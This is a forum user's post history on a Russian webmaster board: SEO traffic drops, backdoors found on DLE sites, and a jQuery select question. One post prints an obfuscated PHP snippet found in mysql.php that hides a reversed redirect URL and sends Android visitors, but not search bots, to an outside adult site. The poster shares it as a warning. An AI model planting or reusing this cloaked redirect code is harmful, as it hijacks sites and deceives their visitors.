Jump to content

sheckler

Members
  • Content Count

    117
  • Joined

  • Last visited

Posts posted by sheckler

  1. Обновляйте полностью код/движок своего сайта. Впервые слышу, чтобы дыры на сайте латали удалением вредоносных кодов. Хакер, зашедший во второй раз на ваш сайт, подсунет код умнее прежнего. Вот и ждите, когда сайт вылетит из поиска.

     

    Само собой разумеется!

  2. Аналогичная ситуация с комерс сайтом, просто яша мудак, который намерено писсимизирует в выдаче стариков, заставляя их переходить на директ. Не зря же гугл корпорацией дорба зовут, делай все правильно и будет тебе щастя. А яша наглый монополист которому все мало. Лично я новый проект заточил по гошу, трафик пошел с 3го дня после открытия индексирования.(тоже комерс)

     

    Ну все же яндекс отсеивать всё равно не стоит))

     

    А так наблюдаю сейчас за статистикой, яндекс какраз пришел в норму, а с гугла трафик на 40% просевший. Я так понимаю после удаления этого скрипта (редиректа) в норму приходит потихоньку всё это дело, жду пока без паники))

  3. У меня по комерческим сайтам просто необъяснимое падение трафика последние 10 дней, нет ни у кого схожей ситуации?

    В апдейт гугл дает позиции в +, яндекс в -

     

    Такая же ерунда, коммерция страдает. Гугл даёт свой трафик, а яндекс уменьшает. Возможно конечно в моём случае после удаления вирусного кода нужно еще немного подождать. А в Вашем случае если в яндекс.вебмастер никаких замечаний не пишет и отдельные типы страниц проверены на вирусы (при этом ничего не найдено), то ест смысл попробовать зайти на сайт с телефона, может быть как и я словили мобильный редирект? Либо проверить файлы на кем-то дописанный код редиректа

  4. На самом деле хостинг может влиять на падение трафика. И если исключить такие банальности как плохой канал, слабый сервер и т п , - то скорее всего это происходит из-за неправильной настройки iptables . Я лично был знаком с одним "истериком" , который после детского udp флуда поблокировал роботов яндекса. Так что.. , 

     

    Сервер и канал хороший, ответ сервера быстрый. Много сайтов на нём висит, но вот на коммерческих трафик просел. У меня еще есть сайт фан-клуб сериала, так там наоборот посещаемость (после удаления бекдора) взлетела просто!

  5. Анализируй страницы в выдаче своего сайта. Скорее всего найдешь еще один неприятный сюрприз. Шел, к примеру. В идеале - пересобрать сайт по новой (на чистом cms). Если страниц меньше 50 - идеальный вариант. Если больше - то ищи старые бекапы. 

     

    А как он в выдаче отобразится? Страниц в поиске 1,5к

  6. Что за CMS у сайта?

     

    DLE. Похожая проблема была один раз, находил мобильный редирект и после этого обновлял скрипт на самую новую версию, всё было хорошо. Спустя 1-1,5 года ситуация повторяется, но только удаление вирусного скрипта особых результатов не дало. Думаю может по новой полностью обновить движок.

  7. Добрый день,

     

    Примерно месяц назад начал замечать общее падение трафика в интернете, значение не придал - кризис, все дела. Позиция в рейтинге была как и всегда 4000-5000 места, трафик с поиска снизился с 380-480 до 280-320. Думаю ладно, на общем фоне не критично.

     

    Далее обращаю внимание на дальнейшее падение трафика и падение позиций в рейтинге LI, сайт стал находиться на 7000-9000 месте, трафик снизился до 200-260. На последней неделе очень сильно изменилось количество заказов с сайта и даже тут я подумал, что возможно это на фоне кризиса (хотя мне показалось это странным, продажи по идее уже должны идти на ура в это время по данной тематике).

     

    Ближе к делу:

     

    Буквально 3 дня назад я случайно заскочил в статистику и мои глаза стали по 5 рублей, потому как общий трафик всего сайта упал до 100 хостов в сутки! Сайту 3 года, никаких методов продвижения (только сео оптимизация). Начал выяснять почему, т.к. ошибок в яндекс вебмастере нету (в том числе в новом) и по всем статистикам сайт растет и его позиции должны только улучшаться на фоне того, что было вначале. В общем то поиски проблемы в сайте нашли бекдор, перенаправляющий поисковых ботов и мобильные устройства неведомо куда. Код я удалил, все файлы перерыл (перепроверил) и трафик начал восстанавливаться.

     

    НО:

     

    30-го марта трафик снова стал падать и падает по сегодняшний день, нашел переход на сайт онлайн-кинотеатра в разделе "переходы на сайты без ссылки". Перерыл весь крипт и никаких сторонних кодов или ссылок!

     

    Уже не знаю даже что делать и как быть! Может кто сталкивался?

     

    ps. В сео с 2007 года, никаких ссылок и накруток, методы и стандарты знаю, строго соблюдаю.

  8. Недавно задался вопросом, почему сайт имел посещаемость до 450 хостов в сутки, но через некоторое время просел до 170-220. Сегодня на очередной встрече я показывал свои работы, зашли на один из сайтов с планшета. Главная страница открылась, всё хорошо, затем переходим в "Контакты" и вуаля, нас перебрасывает на порно сайт. Любые остальные разделы также, то есть работает только главная страница.

     

    Честно говоря был очень сильно удивлён. Перерыл все скрипты, затем стал смотреть файлы php и нашёл в engine/classes/mysql.php такой интересный код:

    $gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];
    if(!preg_match('/crawl|andex|oogle|bot/i',$gant)) {
    if((preg_match('/ndroi|htc_|htc-/i',$gant)) and (!isset ($_COOKIE['dle_user_id'])) and($_SERVER['REQUEST_URI'] != '/')) 
    {header(strrev('=REREFER_PTTH&1=ru&lmth.41'.'/67namyrros/'.'stneilc'.'/cc.'.'slm'.'thx'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}
    
    

    Код почистил. Дырой оказалось CHMOD файла .htaccess, заменил его на 444.

     

    Что самое интересное - яндекс вебмастер и другие "проверки на вирусы" ничего не находили. Стал проверять страницы разделов и статических страниц на сервисе secu, он показал серверный редирект на сторонний сайт.

     

    Примерно год назад чистил сайт. Перед новым годом обновлял движок (лицензия), поэтому занесли его на сервер примерно пару месяцев назад. Проверяйте свои сайты, я нашёл на 2х.

     

    ps. Отмечу, что данный редирект срабатывал с устройств android (в принципе по коду видно, на что он ориентирован). С iOS сайт отлично работал

  9. Приветствую. Что-то я логики этого кода не понимаю...

    1. У вас select генерируется скриптом, при этом опция с белым цветом встаёт в фокус. Т.е. заведомо известно, что в селекте выбран именно белый цвет. Так зачем тогда таким мудрёным способом пытаться получить этот самый цвет?

    2. Обычно для получения значения достаточно конструкции вида: myColor = $('select#color').val();

    3. Зачем вы смешиваете JQuery c JS, если JQuery даёт весь необходимый инструментарий: наличие выражения document.getElementById("color").value немного сбивает с толку.

    Мои знания в JS и jquery крайне малы, поэтому я попытался по аналогии передать данные, но не из инпута, а из селекта. Но не могу понять как будет правильно. По идее это дело всё подхватывается и передаётся методом post

  10. Всем привет,

     

    Данный код отправляет данные в переменной igiftwrap:

    if(options.showgiftwrap){$igiftwrap=$('<span>Название поля</span>').appendTo($dsend).prepend('<input type="checkbox" />').find('input').attr({'id':'igiftwrap','value':'результат'});};

    По его аналогу стал делать другую переменную, но с использованием Select:

     

    if(options.showcolor) 
    {
    $color=$('<span>Цвет</span>').appendTo($dsend).prepend('<select id="color" name="color"><option value="0" selected="selected">Белый</option><option value="1">Чёрный</option></select>').find('selected').attr({'id':'color','value':' + document.getElementById("color").value + '});
    };

    Жирным выделил передаваемые данные. Задача - получить данные из формы селекта color в переменную color, но при этом + document.getElementById("color").value + не работает, данные не передаются.. Как я понимаю, ошибка обработки формы. Может кто подскажет как правильно получить из неё данные?

×
×
  • Create New...